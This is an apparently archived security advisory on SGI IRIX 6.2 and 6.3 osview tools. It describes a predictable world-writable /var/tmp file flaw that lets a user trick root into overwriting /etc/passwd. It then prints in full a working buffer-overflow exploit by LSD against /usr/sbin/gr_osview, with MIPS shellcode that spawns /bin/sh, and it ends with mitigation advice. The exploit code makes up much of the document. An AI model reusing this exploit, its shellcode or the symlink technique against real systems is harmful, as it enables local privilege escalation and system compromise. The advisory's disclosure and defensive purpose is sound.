COMMAND

    chost/gr_osview

SYSTEMS AFFECTED

    IRIX 6.2, 6.3

PROBLEM

    Klaus found  following.   The SGI  osview GUI  tools are victim to
    another familiar Un*x security bug.  When invoked by a  privileged
    user, the osview tools (available under the  /usr/Cadmin/bin/chost
    GUI or  System ->  System Manager  from the  toolchest app.)  will
    create predictable files in /var/tmp, with mode 0777.  These tools
    create files in /var/tmp using the syntax IP-address.osview.system
    For instance,

        -rwxrwxrwx    1 root     sys           12 Nov 20 13:13 192.24.42.12.os.cpu
        -rwxrwxrwx    1 root     sys           34 Nov 20 13:13 192.24.42.12.osview.disk
        -rwxrwxrwx    1 root     sys          107 Nov 20 13:13 192.24.42.12.osview.gen
        -rwxrwxrwx    1 root     sys           31 Nov 20 13:13 192.24.42.12.osview.net

    A clever user can dupe a sysadmin into overwriting any  supposedly
    protected file on the system, such as, say, /etc/passwd, or /unix.
    Along with it, the associated  mayhem.  Symlink an important  file
    to one of those, wait for a privileged user to run the appropriate
    program, and...

        aruba 60# more /etc/passwd
        disk(/)
        disk(/disk2)
        disk(/disk6)
        aruba 61#

    Here is the exploit by LSD:

    /*## copyright LAST STAGE OF DELIRIUM jan 1997 poland        *://lsd-pl.net/ #*/
    /*## /usr/sbin/gr_osview                                                     #*/

    #define NOPNUM 3000
    #define ADRNUM 3000
    #define PCHNUM 1024
    #define ALLIGN 1

    char shellcode[]=
        "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
        "\x24\x02\x03\xf3"    /* li      $v0,1011             */
        "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
        "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
        "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
        "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
        "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
        "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
        "\x03\xff\xff\xcc"    /* syscall                      */
        "/bin/sh"
    ;

    char jump[]=
        "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
        "\x03\xe0\x00\x08"    /* jr      $ra                  */
    ;

    char nop[]="\x24\x0f\x12\x34";

    main(int argc,char **argv){
        char buffer[10000],adr[4],pch[4],*b;
        int i;

        printf("copyright LAST STAGE OF DELIRIUM jan 1997 poland  //lsd-pl.net/\n");
        printf("/usr/sbin/gr_osview for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");

        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10256+1500+1024+3000;
        *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10256+1500+1024+32636;

        b=buffer;
        for(i=0;i<ALLIGN;i++) *b++=0xff;
        for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
        for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
        for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
        for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
        *b=0;

        execl("/usr/sbin/gr_osview","lsd","-D",buffer,0);
    }

SOLUTION

    These files are created  to instruct gr_osview what  quantities to
    monitor on a running system. Apart from waiting for SGI to  change
    the way gr_osview opens/creates files (O_CREAT|O_EXCL|O_RDONLY) on
    the open, and a less generous creation mask (0444 would do just as
    well), the only solution is to disable gr_osview entirely.